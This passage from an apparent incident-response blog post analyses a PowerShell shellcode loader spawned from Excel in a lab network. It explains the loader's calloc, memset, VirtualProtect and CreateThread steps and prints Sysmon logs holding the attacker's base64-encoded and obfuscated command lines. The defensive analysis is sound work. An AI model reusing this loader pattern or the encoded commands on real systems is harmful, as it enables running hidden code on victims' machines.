#9cdcfe;">$Zu</span>::CreateThread(<span style="color: #b5cea8;">0</span>,<span style="color: #b5cea8;">0x00</span>,<span style="color: #9cdcfe;">$dV</span>,<span style="color: #b5cea8;">0</span>,<span style="color: #b5cea8;">0</span>,<span style="color: #b5cea8;">0</span>)</div></div></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">As an investigator, we'll want to glean as much as we can as quickly as we can. Several things jump out to me. First and foremost the string of hexadecimal characters delimited by </font><font face="courier">,}</font><font face="inherit">, which is assigned to a variable named </font><font face="courier">$TW</font><font face="inherit">. I take this to be shellcode, but it requires more time and effort to grok.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">We see a variable named <font face="courier">$Ku</font> assigned a string that calls <font face="courier">DllImport</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> multiple times, referencing in order the </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">calloc</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> function in </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">msvcrt.dll</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">, the </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">CreateThread</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> and </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">VirtualProtect</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> functions in </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">kernel32.dll</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> and finally the </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">memset</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> function in </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">msvcrt.dll</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">.</span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">Below the byte array we see a variable created called </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">$Zu</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">. </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">$Zu</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> is set to the result of a call to the <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/add-type?view=powershell-7" target="_blank">Add-Type cmdlet</a>, which is going to cause some just-in-time compilation, triggering the C# compiler, </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">csc.exe</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> and the C# linker, </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">cvtres.exe</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">. This JIT compilation will add the specified functionality to our PowerShell session that wouldn't otherwise be there, essentially allowing the PowerShell session to access C# functionality it may not normally have. In my experience, this compilation will create a dll on disk that may be useful to analysts, though I've not personally taken the time to examine one. Passing it to <a href="https://github.com/erocarrera/pefile" target="_blank">pefile</a> may be insightful. After </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">Add-Type</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> completes, $Zu will be a </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">RunTimeType</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> object. The value of the variable </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">$Ku</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> from above is passed in as the </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">MemberDefinition</font><font face="inherit">, the </font><font face="courier">Name</font><font face="inherit"> of the class created will be </font><font face="courier">UV</font><font face="inherit"> and the </font><font face="courier">Namespace</font><font face="inherit"> will be </font><font face="courier">wXr</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Immediately following the designation of </font><font face="courier">wXr</font><font face="inherit"> as the </font><font face="courier">Namespace</font><font face="inherit">, we see the </font><font face="courier">replace()</font><font face="inherit"> method called on the </font><font face="courier">$Zu</font><font face="inherit">, but I think this will fail as </font><font face="courier">RunTimeType</font><font face="inherit"> objects have no </font><font face="courier">replace()</font><font face="inherit"> method.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Next we have some manipulations of the </font><font face="courier">$TW</font><font face="inherit"> variable. The curly brace is replaced by QhEax, and then the QhEa string is replaced by 0, leaving us with 0x in place of the curly brace and the string is split on the comma character resulting in an array of bytes assigned to $TW. Next up a variable named </font><font face="courier">$RN</font><font face="inherit"> is assigned the value 0x1007. Then </font><font face="courier">$dv</font><font face="inherit"> is assigned the return value from a call to $Zu's <a href="https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/calloc?view=vs-2019" target="_blank">calloc()</a> function, essentially a pointer to the allocated space in memory.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Next a for loop iterates over the </font><font face="courier">$TW</font><font face="inherit"> byte array elements, calling </font><font face="courier"><a href="https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/memset-wmemset?view=vs-2019" target="_blank">memset()</a></font><font face="inherit"> and populating the previously allocated memory (note the use of the </font><font face="courier">$dv</font><font face="inherit"> pointer) with the bytes from </font><font face="courier">$TW</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">After populating the allocated memory, the </font><font face="courier"><a href="https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect" target="_blank">VirtualProtect()</a></font><font face="inherit"> function is called. Of note, the </font><font face="courier">0x40</font><font face="inherit"> value represents a <a href="https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants" target="_blank">memory protection constant</a> of PAGE_EXECUTE_READWRITE.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And finally </font><font face="courier"><a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread" target="_blank">CreateThread()</a></font><font face="inherit"> is called to execute the previously allocated code. Note this is not </font><font face="courier"><a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread" target="_blank">CreateRemoteThread()</a></font><font face="inherit">, which creates a new thread of execution in a remote process, this is creating a new thread in the current PowerShell process. We'll see the latter later.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">So we have a rough outline of what this is doing, but we won't know the details unless we pick apart the byte array. If anyone wants to chime in on a reasonable process for that, I'm all ears. I've dabbled in reversing, but my knowledge in this area is not what I want it to be.</font></span></div><h2 style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Back to Sysmon says</font></span></h2><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Recall our process before we took the detour to analyze our malicious PowerShells. Sysmon captured all of that. We left off reviewing events in the Sysmon log. Let's return to that. We saw PowerShell building an obfuscated set of variables that were going to be handed to another PowerShell instance as an encoded command, which we just spent some time picking apart. Sysmon picks up the execution of that PowerShell process as a child of the first PowerShell process, the grandchild of Excel.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:36.723</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a718-5f14-a4dd-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 1236</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Windows PowerShell</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® Windows® Operating System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: PowerShell.EXE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABpAHMAPQAnACQASwB1AD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKwAiAC4AIgArACIAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcg...NgA0AFwAJABQAE0AJAB1AG0AXAB2ADEALgAwAFwAJAB1AG0AIgA7ACQASQB0AFgAIAA9ACAAJwBUAHIAIgArACIAdQAiACsAIgBlACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQASQB0AFgAJwApAHsAJAB1AG0APQAgACQAawBYAHQAfQA7ACQAdgBGAD0AIgAgACQAdQBtACAAUwB3AGYAWAAgACQAcQB6ACIAOwAkAHYARgA9ACQAdgBGAC4AcgBlAHAAbABhAGMAZQAoACIAUwB3AGYAWAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHYARgA=</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a716-5f14-06ce-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 1604</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font color="#04ff00"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe<span class="Apple-converted-space"> </span>/w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()...</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above I've redacted some portions to save space. Note the </font><font face="courier">ParentCommandLine</font><font face="inherit"> near the bottom was the one we reviewed previously, but the </font><font face="courier">CommandLine</font><font face="inherit"> shows plainly all that the attacker tried to hide or obfuscate to circumvent detection. The above PowerShell instance parents the third one, partially shown below.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:36 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 